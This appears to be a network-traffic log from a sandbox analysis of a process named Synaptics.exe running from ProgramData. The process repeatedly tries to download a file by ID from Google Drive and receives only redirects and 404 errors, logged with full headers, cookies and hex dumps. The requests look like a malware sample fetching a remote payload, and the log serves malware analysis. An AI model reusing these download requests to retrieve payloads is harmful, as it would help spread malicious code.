Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:30 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
2025-01-07 12:18:31 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4HvbgaPcPZwvwbSH0JyG-2ToaNzLwNUPjMb_OFik7n-Kqzn5feggn2Ja3Nl0d5NQ9I
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:31 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce--ScSs8qvgEakHWCB_SQdIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=SZhc7KpC7T7X_R4yEGnNU40kjC7yz3C4_NBUvYTPUWKiYXDIuLwZpAjOF9ocrn4ar2j4bV1J2f0z3dlz4oDnOYNQzR2bwN6GOOAoebYHKlpySm8FUhpfYjo16rCBD_LjcVUQ4yLvGq3_XMw82uBZLD38OBwjWCHX9Fm9FxeZdjzftFSo6zxSzx80; expires=Wed, 09-Jul-2025 12:18:31 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2025-01-07 12:18:31 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HFXgLckLA9xjEi1Pk4rdnA">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-01-07 12:18:31 UTC | 57 | IN | Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.11 | 49780 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:31 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2025-01-07 12:18:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:31 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ycui52JIVgIw7HC9xQ_paA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.11 | 49781 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:31 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2025-01-07 12:18:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:31 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-eZU07D1svZdoQsDN-cQPmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.11 | 49782 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:31 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
2025-01-07 12:18:32 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7spNP93ghvaesPcubp1zMAP3_n3Co983-BhJ5agm3hiiFzyNyFa9FqrcrXbV3oN-9x
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:32 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-EGWS5ndX-zRBe0YR_jXpKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2025-01-07 12:18:32 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6a 64 74 57 33 58 35 64 67 6b 61 50 77 56 37 6b 42 75 48 32 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="UjdtW3X5dgkaPwV7kBuH2g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    13 | 192.168.2.11 | 49784 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:31 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                                                                                                                    2025-01-07 12:18:32 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4uOV_xL7N__W0nzr3nEyPDSdUUsE2KJJHCLBfnFC6E1BpqeU0LGSykG8uV7ZOTM6L1
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:32 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-pMHi68RNn49_7_43Az5uGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:32 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:32 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="SaXZ3l3EjCsHvHEyLV2jZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:32 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    14 | 192.168.2.11 | 49806 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:33 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:33 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-plgBhigCc3PEQjjQiJutyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    15 | 192.168.2.11 | 49807 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:33 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:33 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-9OX9FqL5rb0OI_eWR3YQXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    16 | 192.168.2.11 | 49819 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:34 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:35 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6cEp6pFPNl5Xa7sbX8jQxMNVDdyuC69z5W4yvVkqeGgtUDzo61WRggM6v2LE6QA2WJ12ccfLg
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:34 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-S35fU7U-5pXkSAM-iMVRkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:35 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2025-01-07 12:18:35 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="saCziqWFAkrqMYAFVbNj9g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2025-01-07 12:18:35 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    17 | 192.168.2.11 | 49818 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:34 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:34 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hxHSAdn0QHSghXsrFgrXRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    18 | 192.168.2.11 | 49821 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:34 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:35 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4gW5qOzUKXqTTCjeQ9wP6y6xgQKpAZkIM6Tf_6Zi7Nqxir_6iS-NhQks6DFi9jBE9m
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:34 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-x90EqjtfPlIiA3yQNuK8rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
